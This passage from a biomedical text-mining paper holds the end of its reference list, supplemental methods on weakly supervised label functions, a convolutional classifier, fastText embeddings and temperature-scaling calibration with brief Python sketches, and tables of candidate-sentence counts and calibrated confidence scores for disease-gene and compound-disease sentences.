42. Comparative analysis of five protein-protein interaction corpora
Sampo Pyysalo, Antti Airola, Juho Heimonen, Jari Björne, Filip Ginter, Tapio Salakoski
BMC Bioinformatics (2008-04) https://doi.org/fh3df7
DOI: 10.1186/1471-2105-9-s3-s6 · PMID: 18426551 · PMCID: PMC2349296
43. Support vector machines
M. A. Hearst, S. T. Dumais, E. Osuna, J. Platt, B. Scholkopf
IEEE Intelligent Systems and their Applications (1998-07) https://doi.org/fwgxrj
DOI: 10.1109/5254.708428
44. DTMiner: identification of potential disease targets through biomedical literature mining
Dong Xu, Meizhuo Zhang, Yanping Xie, Fan Wang, Ming Chen, Kenny Q. Zhu, Jia Wei
Bioinformatics (2016-08-09) https://doi.org/f9nw36
DOI: 10.1093/bioinformatics/btw503 · PMID: 27506226 · PMCID: PMC5181534
45. Automatic extraction of gene-disease associations from literature using joint ensemble learning
Balu Bhasuran, Jeyakumar Natarajan
PLOS ONE (2018-07-26) https://doi.org/gdx63f
DOI: 10.1371/journal.pone.0200699 · PMID: 30048465 · PMCID: PMC6061985
46. Exploiting graph kernels for high performance biomedical relation extraction
Nagesh C. Panyam, Karin Verspoor, Trevor Cohn, Kotagiri Ramamohanarao
Journal of Biomedical Semantics (2018-01-30) https://doi.org/gf49nn
DOI: 10.1186/s13326-017-0168-3 · PMID: 29382397 · PMCID: PMC5791373
47. LPTK: a linguistic pattern-aware dependency tree kernel approach for the BioCreative VI CHEMPROT task
Neha Warikoo, Yung-Chun Chang, Wen-Lian Hsu
Database (2018-01-01) https://doi.org/gfhjr6
DOI: 10.1093/database/bay108 · PMID: 30346607 · PMCID: PMC6196310
48. Text Mining for Protein Docking
Varsha D. Badal, Petras J. Kundrotas, Ilya A. Vakser
PLOS Computational Biology (2015-12-09) https://doi.org/gcvj3b
DOI: 10.1371/journal.pcbi.1004630 · PMID: 26650466 · PMCID: PMC4674139
49. Deep learning in neural networks: An overview
Jürgen Schmidhuber
Neural Networks (2015-01) https://doi.org/f6v78n
DOI: 10.1016/j.neunet.2014.09.003 · PMID: 25462637
50. Feature assisted stacked attentive shortest dependency path based Bi-LSTM model for protein–protein interaction
Shweta Yadav, Asif Ekbal, Sriparna Saha, Ankit Kumar, Pushpak Bhattacharyya
Knowledge-Based Systems (2019-02) https://doi.org/gf4788
DOI: 10.1016/j.knosys.2018.11.020
51. Extracting chemical–protein relations with ensembles of SVM and deep learning models
Yifan Peng, Anthony Rios, Ramakanth Kavuluru, Zhiyong Lu
Database (2018-01-01) https://doi.org/gf479f
DOI: 10.1093/database/bay073 · PMID: 30020437 · PMCID: PMC6051439
52. Extracting chemical–protein relations using attention-based neural networks
Sijia Liu, Feichen Shen, Ravikumar Komandur Elayavilli, Yanshan Wang, Majid Rastegar-Mojarad, Vipin Chaudhary, Hongfang Liu
Database (2018-01-01) https://doi.org/gfdz8d
DOI: 10.1093/database/bay102 · PMID: 30295724 · PMCID: PMC6174551
53. Chemical–gene relation extraction using recursive neural network
Sangrak Lim, Jaewoo Kang
Database (2018-01-01) https://doi.org/gdss6f
DOI: 10.1093/database/bay060 · PMID: 29961818 · PMCID: PMC6014134
54. Exploring Semi-supervised Variational Autoencoders for Biomedical Relation Extraction
Yijia Zhang, Zhiyong Lu
arXiv (2019-01-18) https://arxiv.org/abs/1901.06103v1
55. BioBERT: a pre-trained biomedical language representation model for biomedical text mining
Jinhyuk Lee, Wonjin Yoon, Sungdong Kim, Donghyeon Kim, Sunkyu Kim, Chan Ho So, Jaewoo Kang
Bioinformatics (2019-09-10) https://doi.org/ggh5qq
DOI: 10.1093/bioinformatics/btz682 · PMID: 31501885
56. Extraction of protein–protein interactions (PPIs) from the literature by deep convolutional neural networks with various feature embeddings
Sung-Pil Choi
Journal of Information Science (2016-11-01) https://doi.org/gcv8bn
DOI: 10.1177/0165551516673485
57. Deep learning for extracting protein-protein interactions from biomedical literature
Yifan Peng, Zhiyong Lu
arXiv (2017-06-05) https://arxiv.org/abs/1706.01556v2
58. Improving the learning of chemical-protein interactions from literature using transfer learning and specialized word embeddings
P Corbett, J Boyle
Database (2018-01-01) https://doi.org/gf479d
DOI: 10.1093/database/bay066 · PMID: 30010749 · PMCID: PMC6044291
59. Extraction of chemical-protein interactions from the literature using neural networks and narrow instance representation
Rui Antunes, Sérgio Matos
Database (2019-01) https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6796919/
60. Large-scale extraction of gene interactions from full-text literature using DeepDive
Emily K. Mallory, Ce Zhang, Christopher Ré, Russ B. Altman
Bioinformatics (2015-09-03) https://doi.org/gb5g7b
DOI: 10.1093/bioinformatics/btv476 · PMID: 26338771 · PMCID: PMC4681986
61. The new NHGRI-EBI Catalog of published genome-wide association studies (GWAS Catalog)
Jacqueline MacArthur, Emily Bowler, Maria Cerezo, Laurent Gil, Peggy Hall, Emma Hastings, Heather Junkins, Aoife McMahon, Annalisa Milano, Joannella Morales, … Helen Parkinson
Nucleic Acids Research (2016-11-29) https://doi.org/f9v7cp
DOI: 10.1093/nar/gkw1133 · PMID: 27899670 · PMCID: PMC5210590
62. DrugBank 5.0: a major update to the DrugBank database for 2018
David S Wishart, Yannick D Feunang, An C Guo, Elvis J Lo, Ana Marcu, Jason R Grant, Tanvir Sajed, Daniel Johnson, Carin Li, Zinat Sayeeda, … Michael Wilson
Nucleic Acids Research (2017-11-08) https://doi.org/gcwtzk
DOI: 10.1093/nar/gkx1037 · PMID: 29126136 · PMCID: PMC5753335
63. PubTator: a web-based text mining tool for assisting biocuration
Chih-Hsuan Wei, Hung-Yu Kao, Zhiyong Lu
Nucleic Acids Research (2013-05-22) https://doi.org/f475th
DOI: 10.1093/nar/gkt441 · PMID: 23703206 · PMCID: PMC3692066
64. DNorm: disease name normalization with pairwise learning to rank
R. Leaman, R. Islamaj Dogan, Z. Lu
Bioinformatics (2013-08-21) https://doi.org/f5gj9n
DOI: 10.1093/bioinformatics/btt474 · PMID: 23969135 · PMCID: PMC3810844
65. GeneTUKit: a software for document-level gene normalization
M. Huang, J. Liu, X. Zhu
Bioinformatics (2011-02-08) https://doi.org/dng2cb
DOI: 10.1093/bioinformatics/btr042 · PMID: 21303863 · PMCID: PMC3065680
66. Cross-species gene normalization by species inference
Chih-Hsuan Wei, Hung-Yu Kao
BMC Bioinformatics (2011-10-03) https://doi.org/dnmvds
DOI: 10.1186/1471-2105-12-s8-s5 · PMID: 22151999 · PMCID: PMC3269940
67. Collaborative biocuration–text-mining development task for document prioritization for curation
T. C. Wiegers, A. P. Davis, C. J. Mattingly
Database (2012-11-22) https://doi.org/gbb3zw
DOI: 10.1093/database/bas037 · PMID: 23180769 · PMCID: PMC3504477
68. A Proteome-Scale Map of the Human Interactome Network
Thomas Rolland, Murat Taşan, Benoit Charloteaux, Samuel J. Pevzner, Quan Zhong, Nidhi Sahni, Song Yi, Irma Lemmens, Celia Fontanillo, Roberto Mosca, … Marc Vidal
Cell (2014-11) https://doi.org/f3mn6x
DOI: 10.1016/j.cell.2014.10.050 · PMID: 25416956 · PMCID: PMC4266588
69. iRefIndex: A consolidated protein interaction database with provenance
Sabry Razick, George Magklaras, Ian M Donaldson
BMC Bioinformatics (2008) https://doi.org/b99bjj
DOI: 10.1186/1471-2105-9-405 · PMID: 18823568 · PMCID: PMC2573892
70. Uncovering disease-disease relationships through the incomplete interactome
J. Menche, A. Sharma, M. Kitsak, S. D. Ghiassian, M. Vidal, J. Loscalzo, A.-L. Barabasi
Science (2015-02-19) https://doi.org/f3mn6z
DOI: 10.1126/science.1257601 · PMID: 25700523 · PMCID: PMC4435741
71. Mining knowledge from MEDLINE articles and their indexed MeSH terms
Daniel Himmelstein, Alex Pankov
ThinkLab (2015-05-10) https://doi.org/f3mqwp
DOI: 10.15363/thinklab.d67
72. Integrating resources with disparate licensing into an open network
Daniel Himmelstein, Lars Juhl Jensen, MacKenzie Smith, Katie Fortney, Caty Chung
ThinkLab (2015-08-28) https://doi.org/bfmk
DOI: 10.15363/thinklab.d107
73. Legal confusion threatens to slow data science
Simon Oxenham
Nature (2016-08) https://doi.org/bndt
DOI: 10.1038/536016a · PMID: 27488781
74. An analysis and metric of reusable data licensing practices for biomedical resources
Seth Carbon, Robin Champieux, Julie A. McMurry, Lilly Winfree, Letisha R. Wyatt, Melissa A. Haendel
PLOS ONE (2019-03-27) https://doi.org/gf5m8v
DOI: 10.1371/journal.pone.0213090 · PMID: 30917137 · PMCID: PMC6436688
75. Snorkel MeTaL
Alex Ratner, Braden Hancock, Jared Dunnmon, Roger Goldman, Christopher Ré
Proceedings of the Second Workshop on Data Management for End-To-End Machine Learning - DEEM’18 (2018) https://doi.org/gf3xk7
DOI: 10.1145/3209889.3209898 · PMID: 30931438 · PMCID: PMC6436830
76. Snorkel
Alexander Ratner, Stephen H. Bach, Henry Ehrenberg, Jason Fries, Sen Wu, Christopher Ré
Proceedings of the VLDB Endowment (2017-11-01) https://doi.org/ch44
DOI: 10.14778/3157794.3157797 · PMID: 29770249 · PMCID: PMC5951191
77. A Sensitivity Analysis of (and Practitioners’ Guide to) Convolutional Neural Networks for Sentence Classification
Ye Zhang, Byron Wallace
arXiv (2015-10-13) https://arxiv.org/abs/1510.03820v4
78. Adam: A Method for Stochastic Optimization
Diederik P. Kingma, Jimmy Ba
arXiv (2014-12-22) https://arxiv.org/abs/1412.6980v9
79. Distributed Representations of Words and Phrases and their Compositionality
Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg Corrado, Jeffrey Dean
arXiv (2013-10-16) https://arxiv.org/abs/1310.4546v1
80. Enriching Word Vectors with Subword Information
Piotr Bojanowski, Edouard Grave, Armand Joulin, Tomas Mikolov
arXiv (2016-07-15) https://arxiv.org/abs/1607.04606v2
81. Efficient Estimation of Word Representations in Vector Space
Tomas Mikolov, Kai Chen, Greg Corrado, Jeffrey Dean
arXiv (2013-01-16) https://arxiv.org/abs/1301.3781v3
82. On Calibration of Modern Neural Networks
Chuan Guo, Geoff Pleiss, Yu Sun, Kilian Q. Weinberger
arXiv (2017-06-14) https://arxiv.org/abs/1706.04599v2
83. Accurate Uncertainties for Deep Learning Using Calibrated Regression
Volodymyr Kuleshov, Nathan Fenner, Stefano Ermon
arXiv (2018-07-01) https://arxiv.org/abs/1807.00263v1
## Supplemental Methods
### Label Function Categories
Label functions can be constructed in a multitude of ways; however, many label functions share similar characteristics with one another. We grouped these characteristics into the following categories: databases, text patterns and domain heuristics. Most of our label functions fall into the text pattern category, while the others are distributed across the database and domain heuristic categories (Supplemental Table 1). Below, we describe each category and provide an example that refers to the following candidate sentence: “PTK6 may be a novel therapeutic target for pancreatic cancer”.
Databases: These label functions incorporate existing databases to generate a signal, as seen in distant supervision [4]. These functions detect whether a candidate sentence’s co-mention pair is present in a given database. If the pair is present, the label function emits a positive label and abstains otherwise. A separate label function emits a negative label if the pair is not present in any existing database. We used a separate label function to prevent a label imbalance problem that we encountered during development: emitting positives and negatives from the same label function caused downstream classifiers to generate almost exclusively negative predictions.
$\Lambda_{DB}(\color{#875442}{D}, \color{#02b3e4}{G}) = \begin{cases} 1 & (\color{#875442}{D}, \color{#02b3e4}{G}) \in DB \\ 0 & otherwise \\ \end{cases}$
$\Lambda_{\neg DB}(\color{#875442}{D}, \color{#02b3e4}{G}) = \begin{cases} -1 & (\color{#875442}{D}, \color{#02b3e4}{G}) \notin DB \\ 0 & otherwise \\ \end{cases}$
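A minimal sketch of this pair of label functions is shown below. The Candidate record and all names are hypothetical illustrations of the formulas above; real candidates also carry parse information:

```python
from collections import namedtuple

# Hypothetical candidate record for a disease-gene co-mention pair.
Candidate = namedtuple("Candidate", ["disease_id", "gene_id", "sentence"])

def lf_in_database(candidate, db_pairs):
    """Lambda_DB: positive label if the co-mention pair is in the
    given database, abstain otherwise."""
    return 1 if (candidate.disease_id, candidate.gene_id) in db_pairs else 0

def lf_not_in_any_database(candidate, all_db_pairs):
    """Lambda_notDB: negative label if the pair appears in no existing
    database, abstain otherwise."""
    return -1 if (candidate.disease_id, candidate.gene_id) not in all_db_pairs else 0
```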
Domain Heuristics: These label functions used results from published text-based analyses to generate a signal. For our project, we used dependency path cluster themes generated by Percha et al. [31]. If a candidate sentence’s dependency path belonged to a previously generated cluster, then the label function emitted a positive label and abstained otherwise.
$\Lambda_{DH}(\color{#875442}{D}, \color{#02b3e4}{G}) = \begin{cases} 1 & Candidate \> Sentence \in Cluster \> Theme\\ 0 & otherwise \\ \end{cases}$
Text Patterns: These label functions are designed to use keywords and sentence context to generate a signal. For example, a label function could focus on the number of words between two mentions or focus on the grammatical structure of a sentence. These functions emit a positive or negative label depending on the context.
$\Lambda_{TP}(\color{#875442}{D}, \color{#02b3e4}{G}) = \begin{cases} 1 & "target" \> \in Candidate \> Sentence \\ 0 & otherwise \\ \end{cases}$
$\Lambda_{TP}(\color{#875442}{D}, \color{#02b3e4}{G}) = \begin{cases} -1 & "VB" \> \notin pos\_tags(Candidate \> Sentence) \\ 0 & otherwise \\ \end{cases}$
Each text pattern label function was constructed by manual examination of sentences within the training set. For example, from the candidate sentence above one would extract the keywords “novel therapeutic target” and incorporate them into a text pattern label function. After initial construction, we tested and augmented the label function using sentences in the tuning set. We repeated this process for every label function in our repertoire.
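The two text pattern formulas above might look as follows in code (a hedged sketch; the function names and exact keyword are illustrative):

```python
def lf_target_keyword(sentence):
    """Positive text pattern: the sentence mentions a therapeutic target,
    as in "PTK6 may be a novel therapeutic target for pancreatic cancer"."""
    return 1 if "therapeutic target" in sentence.lower() else 0

def lf_no_verb(pos_tags):
    """Negative text pattern: sentences without any verb ("VB*" tags from
    the part-of-speech tagger) rarely assert a relationship."""
    return -1 if not any(tag.startswith("VB") for tag in pos_tags) else 0

lf_target_keyword("PTK6 may be a novel therapeutic target for pancreatic cancer")  # 1
```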
Table 1: The distribution of label functions per relationship type.

| Relationship | Databases (DB) | Text Patterns (TP) | Domain Heuristics (DH) |
| --- | --- | --- | --- |
| DaG | 7 | 20 | 10 |
| CtD | 3 | 15 | 7 |
| CbG | 9 | 13 | 7 |
| GiG | 9 | 20 | 8 |
### Training Models
#### Generative Model
The generative model is a core part of this automatic annotation framework. It integrates the signals emitted by multiple label functions and assigns a training class to each candidate sentence. This model assigns training classes by estimating the joint probability distribution of the latent true class ($$Y$$) and the label function signals ($$\Lambda$$), $$P_{\theta}(\Lambda, Y)$$. Assuming the label functions are conditionally independent given the true class, the joint distribution is defined as follows:
$P_{\theta}(\Lambda, Y) = \frac{\exp(\sum_{i=1}^{m} \theta^{T}F_{i}(\Lambda, Y))} {\sum_{\Lambda'}\sum_{Y'} \exp(\sum_{i=1}^{m} \theta^{T}F_{i}(\Lambda', Y'))}$
where $$m$$ is the number of candidate sentences, $$F$$ is the vector of summary statistics and $$\theta$$ is a vector of weights for each summary statistic. The summary statistics used by the generative model are as follows:
$F^{Lab}_{i,j}(\Lambda, Y) = \unicode{x1D7D9}\{\Lambda_{i,j} \neq 0\}$ $F^{Acc}_{i,j}(\Lambda, Y) = \unicode{x1D7D9}\{\Lambda_{i,j} = y_{i}\}$
Lab is the label function’s propensity (the frequency with which a label function emits a non-zero signal). Acc is the individual label function’s accuracy given the training class. This model optimizes the weights ($$\theta$$) by minimizing the negative log marginal likelihood of the observed label matrix, marginalizing over the latent classes:

$\hat{\theta} = argmin_{\theta} -log \sum_{Y} P_{\theta}(\Lambda, Y)$
In the framework we used predictions from the generative model, $$\hat{Y} = P_{\hat{\theta}}(Y \mid \Lambda)$$, as training classes for our dataset [75,76].
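To illustrate how these probabilistic training classes can be consumed downstream, the sketch below trains against the generative model’s marginals with a soft cross-entropy rather than hard 0/1 labels. This is our illustration in PyTorch, not the exact implementation used by the framework:

```python
import torch
import torch.nn.functional as F

def noise_aware_loss(logits, p_pos):
    """Cross-entropy against probabilistic labels P(Y = 1 | Lambda)
    produced by the generative model.
    logits: (n, 2) discriminative-model outputs
    p_pos:  (n,)  marginal probability of the positive class"""
    log_probs = F.log_softmax(logits, dim=1)
    targets = torch.stack([1 - p_pos, p_pos], dim=1)  # (n, 2)
    return -(targets * log_probs).sum(dim=1).mean()
```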
#### Discriminative Model
The discriminative model is a neural network trained to produce classification labels by integrating the predicted probabilities from the generative model with sentence representations built from word embeddings. The goal of this combined approach is to develop models that learn text features associated with the overall task beyond those captured by the supplied label functions. We used a piecewise convolutional neural network with multiple kernel filters as our discriminative model. Each filter has a fixed width of 300 (the dimensionality of the word embeddings) and a fixed height of 7 (Figure 4); we chose a height of 7 because it was previously reported to optimize performance in relationship classification [77]. We trained this model for 15 epochs using the Adam optimizer [78] with PyTorch’s default parameter settings and a learning rate of 0.001 that is halved every epoch until a lower bound of 1e-5 is reached, which we observed was often sufficient for convergence. We added an L2 penalty (lambda=0.002) on the network weights to prevent overfitting. Lastly, we added a dropout layer (p=0.25) between the fully connected layer and the softmax layer.
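For concreteness, a minimal (non-piecewise) variant of such a sentence classifier can be sketched in PyTorch as below. The filter count is our assumption, and a true piecewise model would max-pool each segment of the sentence (relative to the two mentions) separately:

```python
import torch
import torch.nn as nn

class SentenceCNN(nn.Module):
    """Simplified convolutional sentence classifier: kernels span
    7 tokens across the full 300-d embedding width."""
    def __init__(self, num_filters=100, emb_dim=300, kernel_height=7):
        super().__init__()
        self.conv = nn.Conv2d(1, num_filters, (kernel_height, emb_dim))
        self.dropout = nn.Dropout(p=0.25)
        self.fc = nn.Linear(num_filters, 2)

    def forward(self, x):                 # x: (batch, seq_len, emb_dim)
        x = x.unsqueeze(1)                # add a channel dimension
        x = torch.relu(self.conv(x)).squeeze(3)
        x = torch.max_pool1d(x, x.size(2)).squeeze(2)  # max over time
        return self.fc(self.dropout(x))   # logits; softmax applied in loss

model = SentenceCNN()
opt = torch.optim.Adam(model.parameters(), lr=1e-3, weight_decay=0.002)
for epoch in range(15):
    lr = max(1e-3 * 0.5 ** epoch, 1e-5)   # halve each epoch, floor at 1e-5
    for group in opt.param_groups:
        group["lr"] = lr
    # ... one training pass over minibatches goes here ...
```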
#### Word Embeddings
Word embeddings are representations that map individual words to real-valued vectors of user-specified dimensionality. These embeddings have been shown to capture semantic and syntactic information between words [79]. We trained Facebook’s fastText [80] on all candidate sentences for each individual relationship pair to generate word embeddings. fastText uses a skip-gram model [81], which predicts the surrounding context of a candidate word, paired with a scoring function that treats each word as a bag of character n-grams. We trained this model for 20 epochs using a window size of 2 and generated 300-dimensional word embeddings. We used the optimized word embeddings as input to our discriminative model.
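With the fasttext Python bindings, this training configuration would look roughly as follows (the input file name is hypothetical, with one tokenized candidate sentence per line):

```python
import fasttext

# Skip-gram model with subword (character n-gram) features.
model = fasttext.train_unsupervised(
    "candidate_sentences.txt",  # hypothetical corpus file
    model="skipgram",
    dim=300,    # 300-dimensional embeddings
    ws=2,       # window size of 2
    epoch=20,   # 20 training epochs
)
vec = model.get_word_vector("ptk6")  # embedding fed to the discriminative model
```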
#### Calibration of the Discriminative Model
Many tasks require a machine learning model to output reliable probability predictions. A model is well calibrated if the probabilities emitted by the model match the observed probabilities; for example, a well-calibrated model that assigns a class label with 80% probability should have that class appear 80% of the time. Deep neural networks are often poorly calibrated [82,83] and are usually over-confident in their predictions. For this reason, we calibrated our convolutional neural network using temperature scaling [82]. Temperature scaling uses a parameter T to scale each value of the logit vector (z) before it is passed into the softmax (SM) function.
$\sigma_{SM}(\frac{z_{i}}{T}) = \frac{\exp(\frac{z_{i}}{T})}{\sum_{j}\exp(\frac{z_{j}}{T})}$
We found the optimal T by minimizing the negative log likelihood (NLL) on the tuning set.
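Following the recipe of Guo et al. [82], the single parameter T can be fit with a few lines of PyTorch. This is our sketch; optimizing log T keeps the temperature positive:

```python
import torch

def fit_temperature(logits, labels):
    """Fit T by minimizing NLL on the tuning set.
    logits: (n, 2) uncalibrated outputs; labels: (n,) class indices."""
    log_t = torch.zeros(1, requires_grad=True)
    opt = torch.optim.LBFGS([log_t], lr=0.01, max_iter=50)
    nll = torch.nn.CrossEntropyLoss()

    def closure():
        opt.zero_grad()
        loss = nll(logits / log_t.exp(), labels)
        loss.backward()
        return loss

    opt.step(closure)
    return log_t.exp().item()
```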
## Supplemental Figures
### Discriminative Model Calibration
Even deep learning models with impressive AUROC and AUPR statistics can be subject to poor calibration, and such models are typically overconfident in their predictions [82,83]. We attempted to use temperature scaling to fix the calibration of the best performing discriminative models (Supplemental Figure 9). Before calibration (green lines), our models were aligned with the ideal calibration only when predicting low probability scores (close to 0.25). Applying the temperature scaling algorithm (blue lines) did not substantially improve the calibration of the model in most cases. The exception to this pattern is the Disease associates Gene (DaG) model, where high confidence scores became better calibrated. Overall, calibrating deep learning models is a nontrivial task that may require more sophisticated approaches.
### Text Mined Edges Can Expand a Database-derived Knowledge Graph
One of the goals of our work is to measure the extent to which learning multiple edge types could construct a biomedical knowledge graph. Using Hetionet v1 as an evaluation set, we measured this framework’s recall and quantified how many new edges could be added with high confidence. Overall, we were able to recall more than half of the preexisting edges for all edge types (Supplemental Figure 10) and report our top-scoring sentences for each edge type in the supplemental tables below. Our best recall is for the Compound treats Disease (CtD) edge type, where we retain 85% of preexisting edges and can add over 6,000 new edges to that category. In contrast, we could only recall close to 70% of existing edges for the other categories; however, we can add over 40,000 novel edges to each of them. This highlights that Hetionet v1 is missing a considerable amount of biomedical information and that this framework is a viable way to close the information gap.
### Comparison with CoCoScore using Hetionet v1 as an Evaluation Set
Our model showed promising performance in terms of recalling edges in Hetionet v1. We assessed our model’s performance relative to CoCoScore, a recently published method [30]. Though our method is primarily designed to score individual assertions, not edges, we compared performance at the edge level because edge-level scores were available for CoCoScore. We found that a simple summary approach, the maximum sentence score, provided performance comparable to CoCoScore for the compound treats disease (CtD) edge type and slightly poorer performance for the other edge types (Supplemental Figure 11). Sentence-level scores can be integrated in multiple ways, and approaches that consider more complexity (e.g., the number of high-probability sentences) should be evaluated in future work.
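A minimal sketch of the edge-level summarization and equal-error-rate cutoff described in the Experimental Design (the column names and the use of pandas are our assumptions):

```python
import numpy as np
import pandas as pd

def edge_scores(sentence_df):
    """Collapse calibrated sentence scores to one score per co-mention
    pair by taking the maximum."""
    return sentence_df.groupby(["entity1_id", "entity2_id"])["score"].max()

def eer_threshold(scores, truth):
    """Cutoff where the false-positive and false-negative rates are
    (approximately) equal; scores and truth are aligned numpy arrays."""
    thresholds = np.unique(scores)
    fpr = np.array([(scores[~truth] >= t).mean() for t in thresholds])
    fnr = np.array([(scores[truth] < t).mean() for t in thresholds])
    return thresholds[np.argmin(np.abs(fpr - fnr))]
```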
## Supplemental Tables
### Distribution of Candidate Sentences
Table 2: Statistics of Candidate Sentences. We sorted each candidate sentence into a training, tuning or testing set. Numbers in parentheses show the number of positives and negatives that resulted from the hand-labeling process.

| Relationship | Train | Tune | Test |
| --- | --- | --- | --- |
| Disease Associates Gene | 2.35M | 31K (397+, 603-) | 313K (351+, 649-) |
| Compound Binds Gene | 1.7M | 468K (37+, 463-) | 227K (31+, 469-) |
| Compound Treats Disease | 1.013M | 96K (96+, 404-) | 32K (112+, 388-) |
| Gene Interacts Gene | 12.6M | 1.056M (60+, 440-) | 257K (76+, 424-) |
### Discriminative Model Calibration Tables
Table 3: Contains the top ten Disease-associates-Gene confidence scores before and after model calibration. Disease mentions are highlighted in brown and gene mentions in blue.

| Disease Name | Gene Symbol | Text | Before Calibration | After Calibration |
| --- | --- | --- | --- | --- |
| prostate cancer | DKK1 | conclusion : high dkk-1 serum levels are associated with a poor survival in patients with prostate cancer . | 0.999 | 0.916 |
| breast cancer | ERBB2 | conclusion : her-2 / neu overexpression in primary breast carcinoma is correlated with patients ’ age ( under age 50 ) and calcifications at mammography . | 0.998 | 0.906 |
| breast cancer | ERBB2 | the results of multiple linear regression analysis , with her2 as the dependent variable , showed that family history of breast cancer was significantly associated with elevated her2 levels in the tumors ( p = 0.0038 ) , after controlling for the effects of age , tumor estrogen receptor , and dna index . | 0.998 | 0.904 |
| colon cancer | SP3 | ba also decreased expression of sp1 , sp3 and sp4 transcription factors which are overexpressed in colon cancer cells and decreased levels of several sp-regulated genes including survivin , vascular endothelial growth factor , p65 sub-unit of nfkb , epidermal growth factor receptor , cyclin d1 , and pituitary tumor transforming gene-1 . | 0.998 | 0.902 |
| breast cancer | ERBB2 | in breast cancer , overexpression of her2 is associated with an aggressive tumor phenotype and poor prognosis . | 0.998 | 0.898 |
| breast cancer | BCL2 | in clinical breast cancer samples , high bcl2 expression was associated with poor prognosis . | 0.997 | 0.886 |
| adrenal gland cancer | TP53 | the mechanisms of adrenal tumorigenesis remain poorly established ; the r337h germline mutation in the p53 gene has previously been associated with acts in brazilian children . | 0.996 | 0.883 |
| prostate cancer | AR | the androgen receptor was expressed in all primary and metastatic prostate cancer tissues and no mutations were identified . | 0.996 | 0.881 |
| urinary bladder cancer | PIK3CA | conclusions : increased levels of fgfr3 and pik3ca mutated dna in urine and plasma are indicative of later progression and metastasis in bladder cancer . | 0.995 | 0.866 |
| ovarian cancer | EPAS1 | the log-rank test showed that nuclear positive immunostaining for hif-1alpha ( p = .002 ) and cytoplasmic positive immunostaining for hif-2alpha ( p = .0112 ) in tumor cells are associated with poor prognosis of patients with ovarian carcinoma . | 0.994 | 0.86 |
Table 4: Contains the bottom ten Disease-associates-Gene confidence scores before and after model calibration. Disease mentions are highlighted in brown and gene mentions in blue.

| Disease Name | Gene Symbol | Text | Before Calibration | After Calibration |
| --- | --- | --- | --- | --- |
| endogenous depression | EP300 | from a clinical point of view , p300 amplitude should be considered as a psychophysiological index of suicidal risk in major depressive disorder . | 0.202 | 0.379 |
| Alzheimer’s disease | PDK1 | from prion diseases to alzheimer ’s disease : a common therapeutic target , [pdk1 ] . | 0.2 | 0.378 |
| endogenous depression | HTR1A | gepirone , a selective serotonin ( 5ht1a ) partial agonist in the treatment of major depression . | 0.199 | 0.378 |
| Gilles de la Tourette syndrome | FGF9 | there were no differences in gender distribution , age at tic onset or td diagnosis , tic severity , proportion with current diagnoses of ocd/oc behavior or attention deficit hyperactivity disorder ( adhd ) , cbcl internalizing , externalizing , or total problems scores , ygtss scores , or gaf scores . | 0.185 | 0.37 |
| hematologic cancer | MLANA | methods : the sln sections ( n = 214 ) were assessed by qrt assay for 4 established messenger rna biomarkers : mart-1 , mage-a3 , galnac-t , and pax3 . | 0.18 | 0.368 |
| endogenous depression | MAOA | alpha 2-adrenoceptor responsivity in depression : effect of chronic treatment with moclobemide , a selective mao-a-inhibitor , versus maprotiline . | 0.179 | 0.367 |
| chronic kidney failure | B2M | to evaluate comparative beta 2-m removal we studied six stable end-stage renal failure patients during high-flux 3-h haemodialysis , haemodia-filtration , and haemofiltration , using acrylonitrile , cellulose triacetate , polyamide and polysulphone capillary devices . | 0.178 | 0.366 |
| hematologic cancer | C7 | serum antibody responses to four haemophilus influenzae type b capsular polysaccharide-protein conjugate vaccines ( prp-d , hboc , c7p , and prp-t ) were studied and compared in 175 infants , 85 adults and 140 2-year-old children . | 0.174 | 0.364 |
| hypertension | AVP | portohepatic pressures , hepatic function , and blood gases in the combination of nitroglycerin and vasopressin : search for additive effects in cirrhotic portal hypertension . | 0.168 | 0.361 |
| endogenous depression | GAD1 | within-individual deflections in gad , physical , and social symptoms predicted later deflections in depressive symptoms , and deflections in depressive symptoms predicted later deflections in gad and separation anxiety symptoms . | 0.149 | 0.349 |
Table 5: Contains the top ten Compound-treats-Disease confidence scores before and after model calibration. Disease mentions are highlighted in brown and compound mentions in red.

| Compound Name | Disease Name | Text | Before Calibration | After Calibration |
| --- | --- | --- | --- | --- |
| Prazosin | hypertension | experience with prazosin in the treatment of hypertension . | 0.997 | 0.961 |
| Methyldopa | hypertension | oxprenolol plus cyclopenthiazide-kcl versus methyldopa in the treatment of hypertension . | 0.997 | 0.961 |
| Methyldopa | hypertension | atenolol and methyldopa in the treatment of hypertension . | 0.996 | 0.957 |
| Prednisone | asthma | prednisone and beclomethasone for treatment of asthma . | 0.995 | 0.953 |
| Sulfasalazine | ulcerative colitis | sulphasalazine , used in the treatment of ulcerative colitis , is cleaved in the colon by the metabolic action of colonic bacteria on the diazo bond to release 5-aminosalicylic acid ( 5-asa ) and sulpharidine . | 0.994 | 0.949 |
| Prazosin | hypertension | letter : prazosin in treatment of hypertension . | 0.994 | 0.949 |
| Methylprednisolone | asthma | use of tao without methylprednisolone in the treatment of severe asthma . | 0.994 | 0.948 |
| Budesonide | asthma | thus , a regimen of budesonide treatment that consistently attenuates bronchial responsiveness in asthmatic subjects had no effect in these men ; larger and longer trials will be required to establish whether a subgroup of smokers shows a favorable response . | 0.994 | 0.946 |
| Methyldopa | hypertension | pressor and chronotropic responses to bilateral carotid occlusion ( bco ) and tyramine were also markedly reduced following treatment with methyldopa , which is consistent with the clinical findings that chronic methyldopa treatment in hypertensive patients impairs cardiovascular reflexes . | 0.994 | 0.946 |
| Fluphenazine | schizophrenia | low dose fluphenazine decanoate in maintenance treatment of schizophrenia . | 0.994 | 0.946 |
Table 6: Contains the bottom ten Compound-treats-Disease confidence scores before and after model calibration. Disease mentions are highlighted in brown and compound mentions in red.

| Compound Name | Disease Name | Text | Before Calibration | After Calibration |
| --- | --- | --- | --- | --- |
| Indomethacin | hypertension | effects of indomethacin in rabbit renovascular hypertension . | 0.033 | 0.13 |
| Alprazolam | panic disorder | according to logistic regression analysis , the relationships between plasma alprazolam concentration and response , as reflected by number of panic attacks reported , phobia ratings , physicians ’ and patients ’ ratings of global improvement , and the emergence of side effects , were significant . | 0.03 | 0.124 |
| Mestranol | polycystic ovary syndrome | the binding capacity of plasma testosterone-estradiol-binding globulin ( tebg ) and testosterone ( t ) levels were measured in four women with proved polycystic ovaries and three women with a clinical diagnosis of polycystic ovarian disease before , during , and after administration of norethindrone , 2 mg. , and mestranol , 0.1 mg . | 0.03 | 0.123 |
